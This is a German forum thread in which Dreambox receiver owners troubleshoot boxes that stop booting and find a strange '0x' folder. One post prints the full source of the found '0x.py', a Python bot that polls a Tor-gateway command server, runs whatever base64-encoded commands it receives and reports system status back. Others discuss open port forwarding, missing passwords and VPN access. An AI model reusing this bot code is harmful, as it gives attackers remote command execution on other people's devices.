Dream startet nicht (Virus-/Trojaner-Befall)

    • Dream startet nicht (Virus-/Trojaner-Befall)

      Hallo zusammen,

      letzte Woche dachte ich, ich hätte das Image meiner Dream8000 HD zerschossen, jedenfalls startete sie nicht mehr - im Display ging der Balken bis ca. Mitte, dann ging nichts mehr weiter.
      Also habe ich geflasht (Newnigma 4.16), alles wieder eingerichtet, und jetzt geht es heute morgen wieder nicht mehr.

      Aufgefallen war mir schon letzte Woche ein Ordner, der wie aus dem Nichts auftauchte "0x". Gestern abend habe ich den Ordner "0x" erneut im DCC gesehen - das sieht so aus:
      0x
      autofs
      bin
      boot
      .....

      Als ich vorhin die Dream neu startete, ging wieder nichts mehr. Ein Zusammenhang erscheint mir irgendwie logisch zu sein - kann mir aber auch nach mehrmaligem "googeln" keine wirklich Reim darauf machen.

      Kann mir irgendjemand bitte weiterhelfen? Warum taucht dieser Ordner plötzlich auf??? Warum lässt sich die Dream dann nicht mehr starten?

      Gruß Philomathia

      Ich verschiebe mal in den allgemeinen Bereich, da das Thema nicht speziell die DM8000 betrifft und hier vielleicht der ein oder andere User mehr liest und eventuell über die Absicherung seines Netzwerks nachdenkt.
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Joey () aus folgendem Grund: Beitrag verschoben

    • vielleicht hat jemand zugriff auf eure boxen (wenn user/pass nicht geändert wurde)
      und löscht beliebig dateien oder sowas auf der dream.
      vielleicht ist es auch ein virus.

      was befindet sich denn in den komischen ordnern ?
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

    • "plötzlich" ?? bei dir hat der configsaver den crash ausgelöst,
      also müsstest du den benutzt haben.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

    • devil67 schrieb:

      Portfreigaben nach außen gibts natürlich. Wieso die Frage???

      Wieso gibts die "natürlich" ? :tongue: Die braucht im Normalfall kein Mensch! Und öffnet Viren und Fremdzugriffen Tür und Tor (deswegen auch "Port-Freigabe") :D
      Yamp - Musicplayer mit Artist-Art-Hintergrund und "Karaoke Light"- aktuelle Version V3.3.2 hier, bitte beachten: FAQ hier

      Wissen ist eins der wenigen Güter, das sich durch Teilen vermehren lässt .... :thumbsup:

    • Bei mir wars heute genau das selbe .... vor meinen augen startete meine DM 7020HD die sich im Standby befand plötzlich neu und blieb dann bei ca 50% hängen ... nix geht mehr.
      Habe keinerlei Portfreigabe zur Dreambox, da ich Fernzugriff per VPN in der Fritz mache.
      Nach längerem suchen konnte ich meine Dream wieder zum durchstarten bringen, in dem ich mich via Telnet verbunden habe und dort folgendes eingegeben habe :

      init 4 && sleep 15 && enigma2.sh

      Die Box funzt dann wieder wie gewohnt.... bis zum Neustart... dann das selbe spiel

      HILFE

    • Aha, bin ich also nicht allein mit diesem Phänomen. Leider weiß ich nicht, was in dem ominösen Ordner drin war.
      Sobald der Ordner wieder auftauchen sollte, mache ich Screenshots.
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB

    • 2 Dateien: 0x.py + startup.sh

      wenn ich die startup.sh öffne steht da garnix
      der inhalt der 0x.py is folgender:

      import urllib2
      import os,sys,time,base64,random

      done = 0

      x = ""

      botversion = "__v0.1__"

      def sysstat():
      os.system("uptime > /tmp/uptimestat")
      a = file("/tmp/uptimestat").readlines()
      uptime = a[0].replace(" ","_").replace("\n","")
      os.system("rm /tmp/uptimestat")
      return uptime



      while done == 0:
      try:
      ran = str(random.random())
      ran2 = str(random.random())
      ran3 = str(random.random())
      ran4 = str(random.random())
      ran5 = str(random.random())
      ran6 = str(random.random())
      ran7 = str(random.random())
      ips = urllib2.urlopen("http://api.ipify.org?format=json").read()
      content_b = urllib2.urlopen("http://lkz7lmppcmvra6io.onion.link/"+ips.split('"')[3]+"_GETCMD_"+ran+ran2+ran3+ran4+ran5+ran6+ran7).read()
      contentt = base64.b64decode(content_b)
      if contentt == x:
      time.sleep(120)
      elif "reportback" in contentt:
      ran = str(random.random())
      ran2 = str(random.random())
      ran3 = str(random.random())
      ran4 = str(random.random())
      ran5 = str(random.random())
      ran6 = str(random.random())
      ran7 = str(random.random())
      ips = urllib2.urlopen("http://api.ipify.org?format=json").read()
      urllib2.urlopen("http://lkz7lmppcmvra6io.onion.link/"+ips.split('"')[3]+botversion+"_REPORT_"+ran+ran2+ran3+ran4+ran5+ran6+ran7)
      time.sleep(120)
      elif "getsysstat" in contentt:
      sysinfo = sysstat()
      ran = str(random.random())
      ran2 = str(random.random())
      ran3 = str(random.random())
      ips = urllib2.urlopen("http://api.ipify.org?format=json").read()
      urllib2.urlopen("http://lkz7lmppcmvra6io.onion.link/"+ips.split('"')[3]+botversion+"_REPORT_SYSSTAT_"+sysinfo++ran+ran2+ran3)
      else:
      x = contentt
      os.system(contentt)
      time.sleep(20)
      except:
      time.sleep(120)
      pass

    • Zum Thema Portfreigaben:
      Ich habe meine Dream an der Fritzbox via MyFritz freigegeben.
      Sieht dann für DreamWeb etwa so aus :
      dm8000.mxxxxxxxxxxxxxxa.myfritz.net:80/

      Ist da ein fremder Zugriff überhaupt möglich, denn man müsste sich ja über MyFritz mit meinen Zugangsdaten anmelden?
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB

    • Philomathia schrieb:

      Zum Thema Portfreigaben:
      Ich habe meine Dream an der Fritzbox via MyFritz freigegeben.
      Sieht dann für DreamWeb etwa so aus :
      dm8000.mxxxxxxxxxxxxxxa.myfritz.net:80/

      Ist da ein fremder Zugriff überhaupt möglich, denn man müsste sich ja über MyFritz mit meinen Zugangsdaten anmelden?

      Es reicht ein Bot der IP's scannt. Ist der Port offen und kann man ohne Login/Passwort das Webinterface aufrufen hat man Zugriff zur Box.

      Ports sollte man nur Freigeben wenn man
      a) weiss was man tut
      und
      b) den Zugriff zur Box immer mit Passwörtern sichert

      Besser ist KEINE Port Freigabe und stattdessen eine VPN zur Fritzbox einzurichten. Dann erspart man sich all die Probleme.

      Ich würde die so komprimierten Boxen neu aufsetzen, ist wohl die einfachste und sicherste Methode.

    • So, ich habe jetzt erst mal die Portfreigaben deaktiviert.
      Es jetzt wird sich zeigen, ob der Ordner 0x noch einmal auftaucht.

      Gibt es denn bei den anderen Betroffenen auch Portfreigaben???
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB

    • Cyberangel schrieb:

      Ich habe wie schon erwähnt keinerlei Portfreigabe konfiguriert ... Ich mache alles per VPN

      Du hast einen Bot, das zeigt ja dein Posting ganz klar. War kein Port offen, hast du dir den Bot anders eingefangen, vermutlich über irgendein Paket z.B. oder vom irgendeinem anderen Gerät in deinem Netzwerk. Lass mich raten: es ist kein Passwort gesetzt bei der Dreambox? Falls ein Passwort gesetzt ist: dann tippe ich auf ein von dir selbst installiertes Paket zum Beispiel.

      Übrigens: die in dem Botscript enthaltenen onion links verweisen auf Seiten im TOR Netzwerk.